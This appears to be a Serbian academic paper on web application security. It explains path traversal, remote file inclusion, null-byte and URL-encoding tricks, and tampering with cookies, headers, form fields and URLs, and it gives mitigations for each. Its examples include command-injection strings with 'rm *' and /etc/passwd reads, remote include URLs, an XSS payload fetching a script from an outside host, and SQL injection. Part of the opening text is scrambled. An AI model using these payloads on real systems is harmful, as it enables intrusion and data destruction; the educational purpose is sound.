WWW-ROOT je tipičan virtualni direktorijum u Web serveru koji je dostupan HTTP klijentu. Ovo se često naziva kao ranjivost “otkrivanja fajlova”. escapeshellarg($to) . “.com+%3C+% 2Fpass wd%3B+rm+%2A Što rezultuje pokretanje sledeće naredbe: /usr/sbin/sendmail -i korisnik@nesiguran. Konkretno rešenje prethodnog primera bilo bi: <?php $f = popen (`/usr/sbin/sendmail -i`.Korisnik može kontrolisati sadržaj promenljive $to kroz sledeći upit: http://www. U PHP-u se to vrši uz pomoć include().2. Rešenje ovog problema je pažljivo filtriranje korisničkog unosa pre predavanja koda interpreteru. 7. require() i require_once() funkcija. ?> 7. Ako aplikacija ne vrši pravilno proveru i obradu meta-karaktera za opis putanje (path) npr. Ove funkcije kao argument uzimaju naziv datoteke. Koncept uključivanja udaljenih datoteka je vrlo opasan. Web aplikacije mogu da skladište podatke u i/ili van WWW-ROOT direktorijuma u za to predviđenim lokacijama. Skript ima više HTML datoteka te se kroz promenljivu $stranica vrši njihovo prikazivanje zavisno od odabranog redosleda: 31 . Napadač može isto tako da upotrebi ove osobine za stvaranje specijalno pravljenih URL-a. kod koji se često koristi. na primer. w). U sledećem primeru uključivanje datoteke zavisi od korisničkog unosa. pa ga na ovaj način ubaciti u sistem.com/posalji.primer./” moguće je da je aplikacija osetljiva na “path traversal” napad.com /etc/passwd. Napadač može da izradi maliciozan zahtev za podacima o fizičkoj lokaciji fajlova kao što su /etc/passwd itd. jer dozvoljava ubacivanje nepoznatog i moguće opasnog koda direktno u programski kod. rm * Kreativniji napadači mogu čak napisati i virus.php?to=korisnik%40nesiguran. te ih parsuju kao PHP kod. Uveliko pomažu i pri održavanju i čitljivosti koda.. Path traversal napadi se obično koriste zajedno sa napadima poput direktnih OS naredbi ili direktnih SQL injection. Ova mogućnost dozvoljava.3. itd. include_once() . odvajanje datoteka koje služe za klase. Upravo zato je neophodno korištenje escapeshellarg() i escapeshellcmd() funkcija.Otkrivanje putanje dokumenta Mnoge Web aplikacije koriste sistemske fajlove Web servera da bi privremeno i/ili trajno skladištile informacije.2.4.Uključivanje udaljenih datoteka Mnogi skript i progragmski jezici omogućavaju uključivanje u programski kod lokalnih i udaljenih datoteka.

pri čemu kod.com/okvir. on se može skratiti osnovnom C-funkcijom.<?php include($stranica). što će uzrokovati izlistavanje datoteke /etc/passwd na Web browseru napadača. 7.Nulti bajtovi Iako se većina Web aplikacija razvija sa najraznovrsnijim programskim jezicima. Napadač sada ima pristup datoteci stil. PHP interpreter će poslati HTTP zahtev na adresu www.php.com. ukoliko je promenio putanju tako da ona pokazuje na njegov lokalni sistem http://www.nepoznato. Kao primer može poslužiti sledeći deo koda: <?php passthru("/bin/ls ?> /etc/passwd"). Potrebno je napraviti datoteku stil. http://www.com/kod.php').primer. U sljedećem primjeru uključena datoteka ne bi trebalo da zavisi od korisničkog unosa.html sadrži nekoliko linija koda koje mogu biti štetne na strani servera: <?php passthru ('rm ?> *') . npr.php i u nju zapisati kod koji se želi izvršiti na udaljenom serveru.primer.php?stranica=http://nepoznato.2.com/okvir. promenljiva $stranica se može postaviti na željenu vrednost. Prilikom nailaska na funkciju include(). “AAA\0BBB” prihvaćen od Web aplikacije (ili od strane specijalnog programskog jezika) kao validan string. te se postavlja negde ranije u kodu: <?php include ?> ($libdir. Aplikacije koje ne vrše adekvatnu validaciju ulaznih podataka.com. uključiti kod koji je napadač pripremio i izvršiti ga.'stil. Ovo se obično postiže URL 32 . http://www.html. Napadač može kroz delovanje na promenljivoj $libdir promeniti putanju u kojoj će PHP interpreter tražiti datoteku stil. Ovo je moguće pošto C shvata nulti bajt (\0) kao završetak stringa.php?stranica=/etc/passwd ili.5.nepoznato. ?> Preko HTTP GET metoda. mogu se praveriti ubacivanjem nultih bajtova u “kritične” parametre.php. Promenljiva $libdir sadrži informaciju o direktorijumu u kojem su smeštene biblioteke. sve te aplikacije često prepuštaju podatke osnovnim (underlying) C-funkcijama radi dalje obrade i fukcionalnosti. U slučaju da je string.

RFC 1738 specifikacija koja definiše URL-e (Uniform Resource Locator) i specifikacija RFC 2396 za URI (Uniform Resource Identifier) ograničavaju dozvoljene u URL i URI na podskup US-ASCII karaktera. Tehnike ublažavanja Sprečavanje napada putem nultih bajtova podrazumeva da aplikacija proveri validnost svih unetih podataka pre bilo kakvog daljeg rada na njima. skladu sa svojom namenom”. RandomAccessFile i slične Java klase). Postoje dva osnovna načina na koje server prima ulazne podatke od klijenta. Tako da je URL kodirana predstava %20. Najomiljeniji skriptovi i programski jezici za napad su: -Perl (izuzetno). Podaci koji se dodaju URL-u moraju biti specijalno kodirani da bi se poklapali sa URL sintaksom. u USASCII skupu karaktera predstava razmaka (space) decimalnim kodom iznosi 32. Usled ovoga. skraćivanje stringova predatih SQL upitima. Na primer. Sa druge strane. itd. Napadi se najčešće koristite za razotkrivanje fizičkih putanja. Prema RFC 1738 specifikaciji “U URL-u se nekodiranom obliku mogu koristiti jedino alfanumerici. -Java (File." i rezervisani karakteri.6. Ranije verzije HTML-a dopuštale su upotrebu celog ISO-8859-1 (ISO Latin-1) skupa karaktera. manipulacija URL-a i manipulacija formom su dve strane iste medalje. nulti karakter (NULL – decimalni kod 0) može biti URL kodiran. URL kodiranje se vrši tako što se uzima osmobitni heksadecimalni kod datog karaktera. specijalni karakteri "$-_. te mu se dodaje prefiks u vidu znaka za procenat (“%”). Obe ove metode imaju odgovarajuće forme ulaznih tipova (HTTP GET ili POST). zaobilaženje provera validnosti.URL kodiranje Kod standardnih Web aplikacija transfer podataka između klijenata i servera se vrši upotrebom HTTP i HTTPS protokola. 7. podaci mogu biti preneti u HTTP zaglavlju ili mogu biti uključeni u deo upita traženog URL-a.+!*'(). a heksadecimalnim 20. svaki osmobitni kod (npr. Web aplikacije ne ograničavaju i mogu biti predstavljene bilo kojim postojećim skupom karaktera. Kontrolni karakteri iz ASCII skupa npr. Pošto URL kodiranje dopušta da virtualno svaki podatak bude prenesen serveru. -PHP (u zavisnosti od konfiguracije). ili heksadecimalni 00-FF) može biti kodiran. Iako neki karakteri ne moraju biti URL kodirani. U specijalnim slučajevima moguće je koristiti unikod karaktere. pa čak i binarnim podacima.2. kao što mogu biti kodirni i svi HTML entiteti i bilo koji meta karakteri koje koristi operativni sistem i baza podataka.0 dozvoljavala je sve karaktere iz skupa Unikod karaktera. HTML 4.kodiranjem nultih bajtova (%00). fajlova ili informacija o operativnom sistemu. Web aplikacija mora pri prijemu podataka da preduzme odgovarajuće 33 . decimalni 0-255.

mere opreza. 34 .asp: sql = "SELECT lname.update Tehnike ublažavanja Bezbednosne provere treba vršiti nakon što je dekodiranje završeno.yourserver.js"></script> SQL Injection primer Originalni upit baze podataka search. HTTP zahtev: http://www.com/badscript. phone FROM usertable WHERE lname='" & Request. fname.php?mydata=%3cscript%20src=%22http%3a% Generisani HTML: <script src="http://www.asp?lname=smith%27%3bupdate%20usertable% Izvršeni upit baze podataka: SELECT lname.c0m/search. phone FROM usertable WHERE lname='smith'.c0m/script. Uobičajeno je da sam Web server dekodira URL. URL kodiranje može biti mehanizam za prikrivanje mnogih vrsta malicioznog koda.myserver. HTTP odgovor: http://www.php echo $HTTP_GET_VARS["mydata"]. fname. te se ovaj problem može javiti i na samom Web serveru. Cross Site Scipting primer Izvod iz script.myserver.

što je šema kodiranja koja ne pruža kriptografsku zaštitu).3. pa čak i zaglavlja HTTP-a. Kriptografska zaštita na transportnom nivou (SSL) ni na koji način ne štiti od napada. ADMIN=yes. ali obično obuhvata opseg od tokena sesija do nizova koji donose odluke o autorizaciji. turistički Web sajt Cookie: lang=en-us. Nijedan podatak poslat browser-u ne može se smatrati neizmenjenim u odnosu na originalni. Aplikacija proverava svojstva korisnika tako što provera korisnikov id sa odgovarajućom tabelom sesija i pokazuje na varijable 35 . -stringovima URL upita. y=1 . Takođe se koriste kao zgodan mehanizam za skladištenje korisničkih preferenci i drugih podataka uključujući i sesijske tokene. svaki zlonamerni korisnik može izmeniti sadržaj cookie-ja u svoju korist. pošto su alati poput Winhex-a lako dostupni.Manipulacija parametrima Manipulacija podacima koji se razmenjuju između browser-a i Web aplikacije bila je dugo jednostavan ali efikasan način da se aplikacija natera da radi stvari koje ne bi trebalo da budu dostupne običnom korisniku. time=10:30GMT . ADMIN=no. kao što su manipulacija parametrima pri kojima se podaci pre slanja menjaju. koji je protokol bez stanja. time=12:30GMT . Izmene parametara često se mogu vršiti: -cookie-ima. Isto tako SSL štiti cookie-je samo u tranzitu. Cookie: lang=en-us. -poljima forme.3.1. Tehnike ublažavanja Jedan od načina ublažavanja je da se jedan sesijski token koristi da ukazuje na podatke skladištene na serverskoj memoriji. sem u slučaju kada je kriptografski zaštićen na nivou aplikacije. što nije tačno. jednostavno zašto bi primali kao ulaz od strane korisnika vrednosti koje već znamo. Ovo je najpouzdaniji način na koji se obezbeđuje da su podaci pri povratku regularni. Postoji česta zabluda. Bilo stalni ili ne-stalni. U loše projektovanim Web aplikacijama zlonamerni korisnici mogu da menjaju sesijske tokene ili vrednosti sadržane u cookieima. Prema tome. 7. da se ne-stalni cookie-ji ne mogu menjati.7. y=1 . (Mnogi cookie-ji su Base64 kodirani. bezbedni ili ne-bezbedni cookie-ji se mogu od strane klijenta menjati i slati serveru sa URL zahtevom.Manipulacija Cookie-a Cookie-ji su prioritetan metod održavanja stanja u HTTP protokolu. Prostor manipulacije cookie-ja zavisi toga za šta se cookie koristi. -HTTP zaglavljima. Primer iz stvarnog života. Napadač može jednostavno da izmeni parametre cookie–ja u.

tako da izgleda isto kao da je poteklo sa originalnog sajta. moguće je da budu izmenjenog sadržaja. Tehnike ublažavanja Jednostavno rečeno. neki Web projektanti se opredeljuju za pregled dolaznih HTTP zaglavlja. Ovo je najkorektnija metoda za očuvanje korisničkih preferencija putem cookie-ja. što bi ukazivalo na falsifikovanje.9 libwww-FM/2. izmeni njihovu formu i pošalje ih sa svog računara. Na primer.8. koje će pregledati da li cookie-ji sadrže neke neverovatne ili nemoguće vrednosti. Neki Web sajtovi proveravaju ovakvo zaglavlje da bi se uverili da je zahtev potekao sa neke od njihovih stranica. podrazumeva njihovo kriptovanje. Veruje se da ovaj postupak sprečava napadača da.14 Referer: http://www.org Pragma: no-cache Cache-Control: no-cache User-Agent: Lynx/2.3. koje šalje većina Web browsera.2.someplace. ako je u Cookie-ju postavljen “administratorski” fleg. Sledeća tehnika podrazumeva izradu kopči (hooks) za detektovanje upada. i pri HTTP odgovoru od Web servera do Web klijenata. Ovaj bezbednosni mehanizam će zakazati ako napadač uspe da izmeni Referer zaglavlje. na zaglavlja se ne možemo osloniti bez dodatnih bezbednosnih mera.php Content-type: application/x-www-form-urlencoded Content-length: 49 HTTP zagljavlja najčešće koriste samo Web browser-i i Web serveri. u opštem slučaju sadrži URL stranice od koje je zahtev potekao. Posledjna metoda spračavanja falsivikovanja cookie-ja. 7. snimi Web stranice. Ako je zaglavlje nastalo na serverskoj strani (cookie).Manipulacija HTTP zaglavljima HTTP zaglavlja su kontrolne informacije koje se pri HTTP zahtevu prenose od Web klijenata do Web servera.someplace. Primer zaglavlja iz HTTP POST zahteva: Host: www. napadač morati da napiše svoj program (15 linija u Perl-u ili PHP-u). a kako zagljavlja nastaju na klijentskoj strani. Normalni Web browseri ne dopuštaju menjanje zaglavlja. Primer: Referer zagljavlje. dok korisnička id vrednost ne ukazuje na korisnika kao člana razvojnog tima. Međutim.4dev. ono se može 36 . dok većina Web aplikacija ne obraća pažnju na njih.org/login. Tako da će za izvođenje HTTP zahteva.korisničkih podataka u kešu/bazi podataka. na primer.

Kao što je već rečeno.3. korisnik može da ih izmanipuliše. Kod poslat browser-u je samo skup sugestija i nema bezbednosnu vrednost. Tehnika ublažavanja Umesto upotrebe skrivenih polja. te da podnese vrednosti po svom izboru. iako ona još uvek predstavljaju slabu tačku aplikacije. aplikacija koristi jednostavnu formu za podnošenje korisničkog imena i lozinke i podnosi ih CGI-u radi autentifikacije. podaci i kod poslati klijentima ne može se usvojiti kao takav kao validni. Stranica se snimi korišćenjem “view source” opcije. te se HTML izmeni i ponovo učita u browser. Primer: Posmatrajmo istu aplikaciju. Iza forme za logovanje može da se nađe HTML kod: <input name="masteraccess" type="hidden" value="N"> Promenom skrivene vrednosti u Y.Bilo da su ova polja sa unapred zadata (padajući meniji. U slučaju kada je nastalo na strani klijenta (referer) ne bi ga trebalo koristiti za donošenje bilo kakvih bezbednosnih odluka. readonly i polja za unos vrednosti.3. 7. te ukazuje varijable korisničkih podataka u kešu/bazi podataka. U većini slučajeva ovo jednostavan postupak. zlonamerni korisnik može jednostavmo da snimi stranicu. Dalje su nam interesantni tipovi polja disabled. ona proverava cookie sesije sa tebelom sesija. preko SSL-a koristeći HTML. Skrivena polja formi široko se koriste na najrazličitije načine. Kada aplikacija treba da proveri korisničko svojstvo. kao skrivena (Hidden) polja. zatim snimi. Za više informacija o zaglavljima pogledati RFC 2616 koje definiše HTTP 1/1.zaštiti kriptografski. Međutim. Za skirvena polja važe ista pravila kao i za regularna polja. u nadi da će time sprečiti zlonamernog korisnika overflow bafera da unese suviše duge parametre.Manipulacija poljima HTML formi Kada korisnik napravi selekciju na HTML stranici. aplikacija će se logovati kao administrator. Na primer. pre provere tačnosti. check box-ovi itd.). Skrivena polja formi su projektantima jedan od najzgodnijih načina za smeštaj podataka u browser i ujedno najčešći način razmene podataka između stranica i aplikacija tipa wizard-a. 37 . HTML može da skladišti vrednosti polja. polja slobodne forme ili skrivena polja (Hidden Fields). ta selekcija se obično smešta u vrednosti polja forme i šalje aplikaciji kao HTTP zahtev (GET ili POST). Neki projektanti sprečeavaju korisnika da unese predugačko korisničko ime i lozinku tako što postave vrednost polja maxlength=(integer). Ovo je u mnogome pravilan način za prevazilaženje ovog problema. Ovakva polja browser ne prikazuje na ekranu ali ih skuplja i podnosi kao parametre. projektant aplikacije može koristiti sesijski token. ukloni maxlength oznaku i ponovo učita stranicu u svoj browser.

Ova tehnika može se upotrebiti i za spečavanje falsifikovanja parametara URL-a. Ovo je najčešći scenario. Prateći gore opisanu tehniku. GET ili POST. Korisnikov izbor se beleži klikom na submit dugme.com/example?accountnumber=12345&debitamount=1 Zlonamerni korisnik može da napravi svoj broj računa i promeni parametre na sledeći način: http://www. Kada se forma podnosi dolazni par ime/vrednost se ponovo spaja sa tajnim ključem u Incoming Form Message. dodatni digest parametar se može dodati stringovima URL upita. ali se javilo kao problem u nekoliko čuvenih hakerskih napada uključujući i onaj kada su hakeri za 25$ kupili avionske karte od Sjedinjenih Država do Pariza. pripremili i drugačiji pristup. Falsifikovanje sa skrivenim poljima formi je dosta lako.4. Ovakav string se naziva Outgoing Form Message.victim. U slučaju GET metoda sva imena elementa formi i njihove vrednosti će se pojaviti u stringu upita sledećeg URL-a kojeg korisnik vidi u svom browseru. Stranica zapravo skladišti unos u vrednost polja i podnodi je nakon submit naredbe.victim. Parovi ime/vrednost u skrivenim poljima u formi. i odleteli da drže hakerski kongres. dok je falsifikovanje sa stringovima upita još lakše. Zatim se Incoming Form Digest poredi sa Outgoing Form Digest-om (koji se podnosi sa formom) i ako se oni ne poklapaju. Da bi se digest-i poklapli parovi ime/vrednost u Incoming i Outgoing Form Message-u moraju biti sastavljeni istim redom u oba slučaja. Korisnik treba samo da pogleda URL u polju za adresu svog Web browsera. 7. Ovo izgleda trivijalno.U slučaju da se tehnika upotrebe varijabli sesije na može primeniti. mogu se međusobno spojiti u jedan string. koja će ih dalje obraditi. znači da su skrivena polja izmenjena.3.URL manipulacija HTML forme mogu prenositi vrednosti unete u svoja polja koristeći jedan od HTTP metoda. 38 . Takvom stringu se dodaje i tajni ključ koji se nigde u formi ne pojavljuje.com/example?accountnumber=67891&creditamount=999999999 Novi parametri će biti poslati aplikaciji. Izračunava se MD5 digest Incoming Form Message-a. Posmatrajmo sledeći primer: Web stranica dozvoljava autentifikovanom korisniku da iz polja padajućeg menija izabere jedan od njegovih ranije unetih naloga i da nalog zaduži fiksnom količinom nekih jedinica. Naredba šalje sledeći zahtev: http://www.

Postoje dva razloga zašto parametar ne bi trebao da bude u URL-u (ili u formi kao skriveno polje). on se mora kriptografski zaštititi.Na žalost. Jasno je da ovakav parametar ne bi trebao da bude prisutan u URL-u. ovi problemi se ne javljaju samo kod HTML formi. 39 . Kriptografska zaštita može se primeniti na dva načina. Parametre treba obrađivati samo kada aplikacija može nezavisno od predhodnih strana da potvrdi za čega su ti parametri i da su autorizovani za dalju obradu. aplikacija ne bi trebalo da vrši promene računa bez prethodne provere da li korisnik povezan sa datom sesijom ima pravo da menja parametar računa “accountnumber” (broj računa). zato što neko ko stoji iza može da je vidi. Ova tehnika sprečava korisnika da vidi i da menja vrednosti parametara. još jedan oblik falsifikovanja je prisutan u primeru. Razmotrimo slučaj da se promenljiva creditamount poveća sa 1 na 999999999. Kada korisnik klikne na hiperlink da bi prešao sa jednog sajta na drugi. Druga forma kriptografske zaštite je dodavanje dodatnog parametra čija vrednost je MD5 digest stringa upita URL-a (ili skrivenih polja forme). on zapravo šalje GET zahtev. Više detalja o ovoj tehnici dato je u odeljku Manipulacija poljima HTML formi. Ako neki osetljivi parametar ne može biti izuzet i URL-a. Korisnik može jednostavno da pogleda u “Address” prozor svog browser-a i da izmeni vrednosti parametara. U gore navedenom primeru. Lozinke su dobar primer prethodnog. Ova tehnika ne sprečava korisnika da vidi vrednost URL-a. Korisnik ne sme da vidi ni svoju lozinkui u obliku URL. Međutim. što je ranije već opisano. Bolji način je kriptovanje celog stringa upita (ili vrednosti skrivenih polja forme). Skript koji obrađuje zaduženje na nekom računu ne sme da pretpostavi da su odluke o kontroli pristupa donesene na predhodnim stranicama aplikacije. ili da bi se kretao unutar jedne iste aplikacije. Mnogi od ovih zahteva imaju stringove upita baš kao i forme. ali sprečava njegovu izmenu. Sesijski tokeni imaju svoje posebne bezbednosne aspekte. Tehnike ublažavanja Najbolje rešenje je izbeći stavljanje parametara u stringove upita (ili skrivena polja formi). Skoro sva navigacija na internetu se odvija putem hiperlinkova. Zamislite da korisnik ne falsifikuje broj računa već samo iznos. Drugi razlog je – korisniku se ne sme dozvoliti da vidi vrednosti parametara. a i browseri beleže posećene URL-ove u history-ju. Pri slanju parametara od klijenta do servera potrebno im je dodati odgovarajući sesijski token. Gore navedeni primer ilustruje prvi razlog – korisniku se ne sme dozvoliti da postavlja vrednosti parametara.

7.4. Efikasno upravljanje konfiguracijom je prvi u postavljanju preduslova koji će omogućiti pouzdan rad sistema i u slučaju višestrukih napada. ne bi bilo loše proceniti takve alate.2. Komentari nekad potiču iz razvojne faze HTML-a i mogu sadržavati informacije o otklanjanju grešaka.Konfiguracija sistema Serverski softver je često kompleksan. Sistemi koj se danas koriste sastoje se od više softverskih nivoa. sa email-ovima i telefonskim brojevima. Malo je distributera koji pokušavaju da na svoje aplikacije postave bezbedne default konfiguracije. Dok mnogi distributeri sugerišu uklanjanje ovakvih fajlova. tako da sistem može biti izložen napadu sa strana koje je teško ili nemoguće predvideti. Strukturni komentari – se javljaju u HTML kodu. informacije o strukturi Web sajta ili informacije namenjenih vlasnicima sistema ili članovima razvojnog tima. oni zapravo prebacuju brigu o bezbednosti procesa instalacije na leđa korisnika date aplikacije.4. Kako se konfiguracije i faktori u okruženju menjaju u toku vremena. 7.4.Komentari u HTML Komentari koji se nalaze u izvornim kodovima čine kod čitljivijim i pomažu programerima pri procesu dokumentacije. Ovako obezbeđeni sistemi se pokazuju mnogo manje ranjivi u slučajevima uobičajenih napada. Često se po default-u instaliraju razni sempl fajlovi i direktorijumi. pošto su ovakve konfiguracije mnogo ranjivije. obično na početku stranice ili između JavaScript-a i ostatka HTML-a. može u postati slaba karika sistema bez ikakvih indikacija o povećanom riziku.1. pa čak i imena članova razvojnog tima. ovakvi alati nikada neće moći u potpunosti da zamene poznavanje sistema i načina na koji je sistem projektovan da radi. problemima vezanim za razvoj. Praksa stavljanja komentara nastavljena je i pri projektovanju HTML stranica. Kao posledica. pogotovo kada je na razvoju sajta radio veći tim duže vreme. Organizacije moraju prihvatiti da je upravljanje konfiguracijom stalan proces. Na žalost. i dalje je je teško za pravilnu upotrebu. te da se ne može jednom uraditi i tako ostaviti. koji mogu napadaču da pruže gotove napade. Ako distributeri nude alate za upravljanje i obezbeđivanje procesa instalacije vašeg sofvera. 40 . u slučaju da sempl fajlovi sadrže probleme. mogu nepažnjom biti otkrivene. sistem koji je nekada bio dobro zaštićen. Međutim. koje se šalju klijentovom browser-u. Upravljanje konfiguracijom ma koliko bilo bitno.Ostali načini manipulacije 7. i za njegovo pravilno konfigurisanje potrebno je dobro poznavanje kako upotrebljenih protokola tako i njihovog načina rada. sam softver sa svojim default konfiguracijama čini ovaj zadatak mnogo težim. strukturama cookie-ja.

ili nekom osnovnom logikom mapira fajlove i strukturu aplikacije vidljivu sa nivoa prezentacije. Numeracija fajlova/aplikacija koristi kodove odgovora HTTP servera da bi ustanovili da li fajl ili aplikacija postoje.asp raspada” ili “Ne menjati raspored polja u tabeli” su za potencijalnog napadača znak da obrati pažnju. Jednostavna pretraga za fajlovima određenih ekstenzija koje nisu eksplicitno dozvoljene može biti veoma efikasna. Ovakvi kometari obaveštavaju napadača o konkretnim sofverskim paketima () koji se koriste na sajtu. koji skida komentare pre nego što je stranica predata serveru. kao i bekap temp fajlovi. Nestrukturni kometari – su oni koje ostavljaju programeri za podsećanje za vreme razvoja aplikacije. Tehnike ublažavanja Uklonite sve sempl fajlove sa vašeg Web servera. i mogu pokazivati kako se. na primer. Kada se Web sadržaj objavi.Automatski komentari – mnoge alatke za generisanje stranica. Tehnike ublažavanja Za većinu komentara biće dovoljan jednostavan filter. fajlovi upotrebom Web interfejsa uploauduju. Ranjivosti poznate za pronađene pakete tada se mogu isprobati i na samom sajtu. nereferisani fajlovi aplikacije. kao i Web softver često u HTML automatski dodaju komentare u vidu potpisa. bekapovani i fajlovi bez reference Numerisanje fajlova/aplikacija je opšta tehnika koja se koristi u potrazi za fajlvima ili aplikacija koje se mogu upotrebiti ili biti korisne za konstrisanje napada. ovakvi komentari nisu retkost. ovi fajlovi ostaju dostupni iako nijedan HTML na Web-u ne upućuje (referiše) na njih.Stari. 7. Za automatske komentare verovatno je potreban aktivni filter. oni predstvaljaju veliku opasnost.4. Ovo uključuje poznate ranjive fajlove i aplikacije. Ovo omogućuje korisniku da napravi svoju listu poznatih ranjivih fajlova i sumnjivih aplikacija. Web server će vratiti HTTP 200 kod ako fajl postoji i HTTP 404 kod ako dati fajl ne postoji. Na žalost. 41 . Mnogi od ovih fajlova su zastrašujuće opasni. Postarajte se da su svi neželjeni i nepotrebni fajlovi budu uklonjeni. Skriveni/nereferisani fajlovi – mnogi administratori Web sajtova na serveri ostavljaju fajlove kao što su semlp faljovi ili fajlovi koji se instaliraju po default-u. Ako je napadač u stanju da pogodi takav URL. Komentari kao što su “Sledeće skriveno polje mora biti postavljeno na 1 ili se XYZ. on automatski ima pristup takvom resursu.3. Kako ovakvi komentari nisu ni na koji način kontrolisani.

već će umesto nje učitati stranicu kao što je mapa sajta. na primer. i izmeniti u: http://www. Kako projektanti nisu predvideli da ove naredbe koriste obični korisnici. Debug konstrukcija se može naći unutar HTML koda ili JavaScript-a kada se forma vraća serveru jednostavnim dodavanjem linijskog elementa u konstrukciju forme.someWebsite. Ovakvi elementi se u kodu mogu pojaviti kao: <!-. međutim ova tehnika samo usporava.someWebsite.4. 42 . Eksplicitne naredbe – koje se nalaze u kodu ili se mogu uvesti kao deo URL-a. Moderne skenere ranjivosti. tako da pomisle da traženi fajl postoji. Rezultat je isti kao u slučaju predhodnog napada.com/account_check?ID=8327dsddi8qjgqllkjdlas&Disp=no . Implicitne naredbe – naizgled bezopasni elementi stranice.4. ali kada se jednom pronađe uobičajeno je da ga hakeri isprobaju po celom Web sajtu.begins --> <TABLE BORDER=0 ALIGN=CENTER CELLPADDING=1 CELLSPACING=0>> <FORM METHOD=POST ACTION="http://some_poll. koji ukazuje serveru da pređe u debug mod. u slučaju izmene mogu imati nesagledive posledice po server.com/account_check?debug=on&ID=8327dsddi8qjgqllkjdlas&Disp Napadač dalje posmatra ponašanje servera.com/poll?1688591" TARGET="sometarget" <INPUT TYPE=HIDDEN NAME="Poll" VALUE="1122"> <!-. Osnovna namena ovakvih elemenata je bila da pomogne programeru pri modifikovanju sistema kroz različita stanja da bi se vreme potrebno za testiranje skratilo. Ovo zbunjuje osnovne skenere.Neki Web serveri/aplikacije koje izrađuju dinamičke stranice neće poslati 404 poruku browser-u. mere predostrožnosti obično nisu preduzete. Ovim elementima su po pravilu data nejasna imena.Question 1 --> <TR> <TD align=left colspan=2> <INPUT TYPE=HIDDEN NAME="Question" VALUE="1"> <SPAN class="Story"> Pronalaženje debug elementa nije jednostavno.Debug naredbe Debug naredbe se javljaju u dve odvojene forme. 7. kao što su “fubarl” ili “mycheck” itd. Naredbe kao “debug=on” ili “Debug=YES” mogu se naći u URL-u na sledeći način: http://www.

pratite bezbednosne liste kako distributerske.4. Default nalozi obično dolaze sa ranije konfigurisanim default lozinkama koje su opšte poznate. većina aplikacija ne insistira na promeni istih. obično administrator sistema ima standardnu lozinku. Jednom kada je lozinka unešena ili pogođena. . .isprobavanjem brojeva preko lozinke u slučaju da je poznato samo ime naloga. Ovakvim nalozima može se pristupiti sa Web-a bilo standardnim pristupom za sve definisane naloge.7.Default (inicijalni) nalozi Mnoge Web aplikacije inicijalno (po defalut-u) obično imaju najmanje jednog aktivnog korisnika. -gost nalozi. Napad na ovakvim default nalozima može da se pojavi na dva načina: . Uklonite sve nepotrebne naloge. tako i javne. Štaviše. 43 . što dalje vodi u najčešće dva pravca: .pokušaj da se upotrebi default korisničko ime/lozinka pod prepostavkom da oni nisu promenjeni nakon default instalacije.ako je pomenuti nalog bio administratorski napadač tada ima delimičnu ili potpunu kontrolu nad aplikacijom (ponekad i nad celim sajtom) sa mogućnošću bilo kakve zlonamerne radnje. Tehnike ublažavanja Izmenuti standardna podešavanja vezana za instalaciju aplikacije. kao što su administratorske stranice. Web aplikacije omogućavaju višestruke default naloge kao što su: -administratorski nalozi. bilo sa specijalnog porta ili dela aplikacije. Sistem može biti kompromitovan ukoliko napadač koristi ovaj tip naloga.5. napadač ima pristup sajtu u skladu sa ovlašćenjima naloga.ako je u pitanju bio demo ili test nalog. napadač će ovakav naolog iskoristiti kao sredstvo pristupa i zloupotrebe logike aplikacije i koristiti ga u cilju unapređenja napada. -test nalozi. Takav korisnik.

Opasnosti pri upotrebi javnih Web browser-a Svi sistemi treba jasno i stalno da upozoravaju korisnike o opasnostima upotrebe zajedničkih računara. Brojevi računa.3. zdravstveni kartoni. osim ako njihov prikaz nije apsolutno neophodan. -preporučljivo je odjavljivanje sa aplikacije (logout) i gašenje browsera. u cilju osiguranja privatnosti korisnika. moraju biti dodatno obezbeđeni. -kristiti SSL ili TLS. Ovo pruža korisniku veliku fleksibilnost pri upotrebi sigurnih hostova kako na ličnom tako i na zajedničkom računaru. -Sve forme trebalo bi podnositi upotrebom HTTP POST zahteva. Kada je prikaz podataka na stranici neophodan trebalo bi : -podesiti stranicu na pre-expire. i treba praviti bilo kakve pretpostavke u vezi integriteta. kao što su brojevi socijalnog osiguranja.8.Upotreba ličnih podataka Sistem treba obezbediti tako da lične podatke prikazuje samo kada su oni apsolutno neophodni.Opcija «Browser History» Sistem treba da obezbedi da se osetljivi podaci ne vide u korisnikovom browser history-ju. lična imena. -postaviti no-cache meta opciju. -postaviti no-cache-pragma meta opciju. korisnička imena.PROBLEMI PRIVATNOSTI Ovo poglavlje bavi se privatnošću korisnika.2. Upozorenje treba da upozna korisnike sa sledećim: -stranice mogu ostati sačuvane u history-u browsera. telefonski brojevi. brojevi socijalnog osiguranja i druge specifične podatke trebalo bi uvek maskirati (ako je broj računa 123456789. U nekim zemljama i nekim okolnostima. Sistem koji sadrži podatke o korisniku koji su lične prirode. kao što su oni u bibliotekama i internet kafeima. 44 . Samo lična imena ili nadimke bi trebalo prikazivati na mestu imena.1. a brojne identifikatore treba prikazivati samo delom. postoje zakonske regulative o zaštiti privatnosti korisnika. 8. 8. da bi se izbrisali svi cookie-i od predhodne sesije. -moguće je da temp fajlovi ostanu u računaru. kao i detalje o računima. 8. Sajtove ne treba projektovati sa pretpostavkom da je bilo koji deo klijenta bezbedan. -proxy serveri i LAN korisnici mogu presresti podatke koji se razmenjuju. aplikacija bi trebalo da broj prikaže kao *****6789).

Svaki programer koji se bavi razvojem Web aplikacija trebalo bi da. primećuje se da skoro svi direktno zavise od kompetentnosti programera koji proizvode softver. Dakle. prati redovno sve novosti. forume i iskustva drugih programera vezana za bezbednost. 45 . cene i performansi. Pomenuti su samo najvažniji problemi. kao i realizacija tipične aplikacije za timski rad na projektima zasnovane na PHP tehnologiji. Potrebno je pronaći balans između parametara bezbednosti. funkcionalnosti.9. Suština je u tome da je Web zapravo skup desetina različitih tehnologija koje se izvršavaju na različitim platformama. što znači da se radno iskustvo ničim ne može zamenuti. mailing liste. potrebno je detaljno poznavati svaki deo sistema od kojeg se sastoji Web aplikacija. ali mogućnosti za greške ima mnogo. Povećanje sigurnosti može dovesti do smanjenja funkcionalnosti aplikacije (npr. Ovo je bio kratak pregled problema sa kojima se suočava svaki Web programer. ZAKLJUČAK U ovom radu predstavljeni su osnovni koncepti bezbednosti Web aplikacija. Pri izradi Web aplikacija veoma je bitno odrediti koji je stepen bezbednosti potreban. ograničava se broj korisnika). ali je daleko veći problem poštovati ovo jednostavno pravilo u praksi. Pri posmatranju lista najvećih bezbednosnih problema. pored poznavanja tehnologije sa kojom radi. kao i do smanjenja performasi. na koju su primenjeni ovi koncepti. Reći da ne treba verovati ulaznim podacima je lako. što nije lak zadatak.

